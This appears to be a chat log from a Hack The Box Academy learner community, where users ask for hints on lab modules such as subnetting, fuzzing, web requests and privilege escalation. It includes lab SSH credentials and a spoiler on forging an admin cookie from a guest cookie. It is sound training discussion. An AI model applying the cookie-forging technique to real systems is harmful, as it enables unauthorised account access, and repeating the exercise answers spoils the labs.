Hello all! I am working on the AI Red Team path.
Applications of AI in InfoSec
I am the final module : Skills Assessment
Model Validation Feedback
Your model accuracy is 0.0. Please improve it to at least 90% to receive the flag.
Locally my accuracy seems to be around 0.9?
I'm in the privilege escalation module and I'm trying to get root. I'm in as user2 but I just can't connect the reverse shell to my system
can someone DM me?
@tired locust Please take care not to post content from modules above tier 0. If you feel like you need to reveal more info you can ask someone to DM.
Okay
i didnt know sorry
i am doing introduction to networking, and i can't work out how to answer these types of questions. "Submit the decimal representation of the subnet mask from the following CIDR: 10.200.20.0/27"
Decimal = using the numbers 0-9; subnet masks are left-filled 1s (every multiple of 8 is solved)
Remember that ips are in octets (sets of eight 1s)
And each octet is in a range of 0-255, the leftmost of the octet is the highest value (128) and each one subsequent is halved until you get to 1 (128 64 32 16 8 4 2 1) and you just add them together
To make it simpler we can break down /27 (the cidr representation of the subnet mask)
27/8 = 3 remainder 3
This means we have 3 sets of full octets (11111111) a quick way to remember its decimal value is 256-1 since if you had 9 bits, the leftmost bit would be 256 (powers of 2).
The 3 remainder bits are 11100000, subnet masks are never ambiguous and you will never run into cases where you'll have a mask with separated 1s.
Lets look at the decimal table again
128 | 64 | 32 | 16 | 8 | 4 | 2 | 1
  1 |  1 |  1 |  0 | 0 | 0 | 0 | 0
Add those together to get the last value
so 255.255.255 (because full octets) plus the remainder of three means the first three (128, 64, 32 added together) is .224, so 255.255.255.224
thanks, i kinda get it now
thanks
can someone help me in Windows PrivEsc -> windows server section?
i just cant escalate
XXE is a topic covered in the CWES path iirc
Hi there, I am doing this module "SQLMap Essentials" and in the Attack Tuning section the lab is broken. From db I am getting slightly different flag as compare to what the lab actually accepts as answer. Please take a look in that
Is anyone else finding that the targets keep crashing/become unresponsive after a few minutes? I'm finding this is happening pretty frequently in the shells & payloads module
hi guys, I can't find way to solve it, pls help me, Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>)
SSH to 10.129.202.64 (ACADEMY-PWATTACKS-NIX01), with user "sam" and password "B@tm@n2022!"
this question is from Spraying, Stuffing, and Defaults
Anyone done this module that could send a nudge?
quick question, if i started the Web Penetration Tester path in htb academy
in what order do i do the modules? from top to bottom? or by tiers
Top to bottom
ty
Hi all, does anyone have experience with the module attacking common application, osTicket. Can you tell how to find out the login credential for the exercise question?
@elder kindle I haven't done that module and I'm on my phone, but are you sure it's not inlanefreight.htb?
followup question, did anyone make a list of boxes/exercises per module to implement the module's topic?
cuz the mini exercise at the end of each page isnt that much
Hi guys, is anyone else experiencing some with the modules being broken? I'm trying to follow along with the pentest in a nutshell module but the Linux System Enumeration section just wont load, instead redirecting me to the following section. just trying to find out if the problem is on my end or not 😅
trying to install sshuttle for the SSH Pivoting with Sshuttle module but keeps returning error: "unable to locate package shuttle"
anyone has any tips on how to overcome this? Tried a couple of suggestions by ChatGPT and google search results but they failed as well.
Hello folks... I am on the "Applications of AI in infosec" module, "Spam detection, model evaluation" section, and my vm does not seem to be connecting to the internet. I don't know if it is just me or what... I can not upload my model.
It is part of the Linux Essentials where you need to perform curl magic to find paths. But the curl does not resolve in the pwnbox. I fixed it by downloading the HTML source from a webbrowser, but it feels that this is not how this exercise was designed.
Hi guys, hitting an error while trying to logging with the credentials provided by HTB.. I reset IP target machine twice, but not able to login to the Hive platform.
Hello
Anyone available for the HTTP Misconfigurations - Skills Assessment - Hard
woo
damn
wooo
noice
hype hype
hypw
no way
no way
@fair slate Try
sooooooooooon
nowwwwwwww
now
what do you mean @rustic sage ? just treat it as any other weekly release box
i dont have nitro ;-;
lol
aye, in due time all will be clear 🙂
Alright i trust u guys but i still think it would be better to have some upfront info. Anyway all good 🙂 im giving it a go
@rustic sage with the swag shop it was like this too, and then big amounts of PR the next week or so
no nitro
@random sail click to spawn the target
im pming him
ok
🙂
Can someone tell me how I get access to the academy?
@bright thicket root the Academy box
@drifting knoll got it! Thanks
Go go go 🥳
fundamentals cost 10 cubes but give you 10 cubes - so basically they are free! Do them and enjoy
Woah they got a academy now, I've been wanting this for a while lmao
Oh trust me I signed up like instantly lmao, I've been using tryhackme, Hackthebox, and all that good stuff lately but hackthebox having one makes me the happiest cause I Know it the most for how it does things
It is my time
enjoy it!
Also I just realized that I'm in a vm inside a vm and one day I want to test how far I can go
I’m probs gonna be doing this all day
VM inception
I want to as well, it sucks that I start classes again soon but they build towards being better at this anyways so yay(?)
till classes are up, Academy and HBG 
woah this is cool
anyone got a link for this? can't seem to find one
Cyber security training with hands-on exercises and labs
awesome ty
np
00:00 - Intro
01:03 - Accessing Academy
01:45 - Talking about Paths
02:10 - Talking about what a Cube is
03:25 - Showing all the modules and tiers
06:30 - Starting the Intro to Academy Course
08:20 - Showcasing interactive modules by starting a pwnbox instance
10:30 - Spawning...
yee
Taking up the Javascript Deob
I might be dumb but i am on the Learning process Module and i cant answer the last question
I have no clue, i thought i answered correctly
Sorted thanks Agent_Tiro 👍
No problem 
Hey guys, I'm stuck on the Web Requests: Post method question, I guess I have to change the second part (after the _) of the cookie but I can't identify what it is :D
Might someone give me a hint?
I've not done it. But I would suggest having a read over the relevant bits in that section. See how those examples are done using similar techniques then apply those to your problem
Holy fuck this is awesome
Thanks htb for making this
@inland hull My PM's are open. Is this for the JS obe???
hey can anyone help me?
Depends on the Module 😄
PM me
ok
Does it require separate acc on academy`?
Yes
@inland hull I'm stuck in the same part, did you solve it? Can you give me a hint?
Please make the questions not case sensitive cmon i was sitting there like hm xxxxx is right RIGHT no its Xxxxx
@near sluice Your feedback is noted. At the same time, infosec also requires a certain level of attention to detail. Think of it as a challenge haha
insert bug vs. feature blurp
@mighty escarp I didn't
@inland hull @mighty escarp Speaking generally as a developer, the app usually generates a unique ID/account name for the guest account, so the user can use the app without registration. As the ID is unique, he will not lose any data after registering - the random account ID will just be renamed to his email/nickname, etc. ||The final cookie value could be much simpler for the registered admin user.||
When I click on the mail to verify I get an invalid signature
Ok, this was easier than expected... Thank you @silver heron
Could anyone give me a hint for the last question on the JS Obfuscation quest?
||- I thought first it would be hex, but its not working :D||
||- doesn't appear to be base64, cause I get some binary trash - do I have to convert the output multiple times or something like this?||
In the assessment for web fuzzing, it asks for || all the vhosts I can identify ||, but I've entered them all in a few formats and not gotten it marked right yet
It would be nice to have an example to show the format expected
Oh nvm, the format was in the hint haha
I'll add a note in our list of feedback to suggest checking the hints if the format of the question is not crystal clear from the output 😄
Also stuck on Web Requests - Post Method. I’ve exploited the box, but no idea what the answer to the question is. Have tried all the logical things but have a feeling it’s bugged or the answer is something super vague.
@sterile hawk how are you finding that module?
Seems pretty good so far
@silver heron Thanks but I'm still stuck 😦
When fuzzing, how can I determine what integer I need to use as the -fs value?
Hello all! New user here. Can somebody help me with one slight issue please ?
I can't understand what do I need to put here as a result
@rustic sage Which module is that?
it is the POST request
I read what @silver heron suggested but it is not clear in my mind
@steel lance it is whatever you want it to be to filter on from the response size. So if the default response size for errors / not existing is 945 for example. then I would want to filter those results out by doing -fs 945
leaving me with only the responses that do not match that
Oh, is there a list of response sizes for different situations that you know of?
no. it's completely dependent upon the site
it's basically the number of characters in the response iirc
so if you run a quick fuzz and just getting loads of results. filter out the one with the most common
or if you want to filter out different server responses then do that
it's very flexible
Oh, well atm I'm just not filtering anything and looking for the anomaly. It's inefficient but it works
using the filters will make that easier
So if the common response size is 749 for example, I'd just do -fs 749?
yeah
Oh, nice
then run the scan again and see if those anomalies jump out
Thanks, appreciate the help.
personally this is why I use burp intruder (in burp pro) because you can run it then filter afters / or during or sort it by different things.
but ffuf is incredibly versatile once you start digging into it
@rustic sage i believe that once you escalate to admin there will be a flag available to submit
I've found all of the VHOSTS, but what format am I supposed to put it in?
I believe the hint tells you the format to submit in rather than being a hint
it's some feedback I've passed to the team - to make it clear the format should be in. rather than having it as a hint
Oh, that's correct. Thanks for that
no problem
Do you have to register a new account for this? You can't use the HTB account, right?
Currently there is no SSO so new account.
Sure, thanks
@rustic sage Have you managed to solve it?
@quiet topaz no 😦
I understand that I need to intercept the login and capture the cookie to pass it when I try to login with admin:password
but I still get failed
have another read through the relevant material in that section
It's found that the server redirects us back to the login page. This is because it had no way to confirm that we had already authenticated to the service. Hit Ctrl + Z to undo the changes and retain the cookie header.
Up to the Ctrl + Z everything is fine ... then I can't understand what the article wants to tell me
What would a good wordlist be for parameter values?
The param names? Or the values linked to the param?
If its param names the burp param ones that mentioned in the cheatsheet is a good one
The values linked
For values think what might be relevant for a parameter with that name. E.g. if it's id try numbers. If it's email try emails etc
On the hint it says use seclists, I've already tried 1-1000
Yeah. Think about the param value
What would be appropriate values to put against that
Well, I found the correct value but it's not accepting my answer :/
@rustic sage intercept with Burp Suite and change the cookie header from guest_ahsdhahsdha to admin and base64 encode it 🙂
you must have done it wrong
DM me I help you out
i think we broke jsnice with all of us working on JS DeObf
this one worked well for me for those working on that module
🙂
I recommend this one https://beautifier.io/